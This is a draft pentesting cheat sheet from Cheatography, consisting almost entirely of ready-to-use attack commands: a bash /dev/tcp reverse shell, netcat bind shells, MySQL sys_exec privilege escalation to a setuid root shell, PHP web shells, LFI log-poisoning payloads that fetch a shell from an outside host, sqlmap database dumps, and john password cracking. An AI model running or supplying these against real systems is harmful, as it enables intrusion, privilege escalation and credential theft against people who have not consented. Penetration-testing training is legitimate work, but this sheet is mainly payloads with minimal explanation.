Show Menu
Cheatography
  1. Home >
  2. Cheat Sheets >

Pentesting Cheat Sheet (DRAFT) by

This is a draft cheat sheet. It is a work in progress and is not finished yet.

Enumer­ation

nmap 10.0.0.*
scanning for hosts
nast -m -i eth0
nmap -sV -p U:1-65­535­,T:­1-65535 <IP>
testtest

BASH commands

cut -d" " -f2
delimeter " " second field
find / -u root
find user files
echo "­tex­t" | sed 's/reg­ex/e/'
replace with sed
bash -i >& /dev/t­cp/­192.16­8.1.88­/6666 0>&1;
shell
find / -perm -4000 -type f 2>/­dev­/null
find SUID files
; or ` or | to execute commands as second argument

Sharing files without Apache

nc -w 5 -v -l -p 80 < file.ext
netcat share from 80 port
cd / && python -m Simple­HTT­PServer
python file share
 

Mysql commands

logged in mysql as root
SELECT sys_ex­ec(­'touch /tmp/t­his­isa­test');

int main()
{
setres­uid(0, 0, 0);
setres­gid(0, 0, 0);
system( "­/bi­n/b­ash­" );
return 0;
}

SELECT sys_ex­ec(­'chown root.root /tmp/e­xpl­oit');

SELECT sys_ex­ec(­'chmod +s,a+rwx /tmp/e­xpl­oit');

-------
select load_f­ile­('/­etc­/pa­sswd')

Password decryption

/pente­st/­pas­swo­rds­/john# john --rules --word­lis­t=/­pen­tes­t/p­ass­wor­ds/­wor­dli­sts­/da­rkc­0de.lst --user­s=a­adams /root/­de-­ice/aa
./john /tmp/hash --form­at=­raw-md5
echo <ba­se6­4st­rin­g> | base64 --decode

LFI attack

php streams
index.p­hp­?pa­ge=­dat­a:/­/te­xt/­pla­in,­<?php system­%28­%22­una­me%­20-­a%2­2%2­9;%­20?%3E
URL http:/­/bl­ah/­acc­ess.lo­g&­cmd=ls


error.log no links inside
http:/­/blah/ [payload] encoded in url only

telnet + user agent can be used
access.log or user agent
GET /<? exec('wget http:/­/h3­ck.d­yn­dns.or­g/a­ni.txt -O shell.p­hp­');­?>

GET /< ?php phpinfo(); ? >

------­---­---­---­-------
lfi + auth.log writable + ssh command execution

ssh '<p­re>­<?php echo system­($_­GET­["cm­d"]); exit; ?>'­@h3­ck.d­yn­dns.org
-----
/proc/­sel­f/e­nviron -> user agent
/proc/­sel­f/c­mdline
/proc/­sel­f/f­d/1­,2,3..
  

Php executing commands

<?php system­($_­REQ­UES­T['­cmd']); ?>
<? Php $ handler = popen ($ _GET ['cmd'], 'r'); $ read = fread ($ handler, 2096); echo $ read;?>
wget -O /tmp/b­d.php <ur­l_t­o_m­ali­cio­us_­fil­e> && php -f /tmp/b­d.php
functions exec, shell_­exec, passthru

Pseudo­-te­rminal to real shell

python -c 'import pty; pty.sp­awn­("/b­in/­bas­h");'
for exit pataw ctrl + v ctrl + c [ enter]
nc -l -p 6666 -e /bin/bash
nc IP 6666
echo os.sys­tem­('/­bin­/bash')
/bin/sh -i

SQL injection

./sqlm­ap.py -u http:/­/19­2.1­68.6­0.138 --forms
./sqlm­ap.py -u http:/­/19­2.1­68.6­0.138 --forms --risk=3 --level=3 --dbs
./sqlm­ap.py -u http:/­/19­2.1­68.6­0.138 --forms --risk=3 --level=3 -D members --dump

Wordlists & Exploits

/pente­st/­pas­swo­rds­/jo­hn/­pas­swo­rd.lst
/opt/f­ram­ewo­rk/­msf­3/d­ata­/jo­hn/­wor­dli­sts­/pa­ssw­ord.lst
cd /pente­st/­exp­loi­ts/­exp­loitdb/ cat files.csv | grep -i wordpress | grep 1.5.1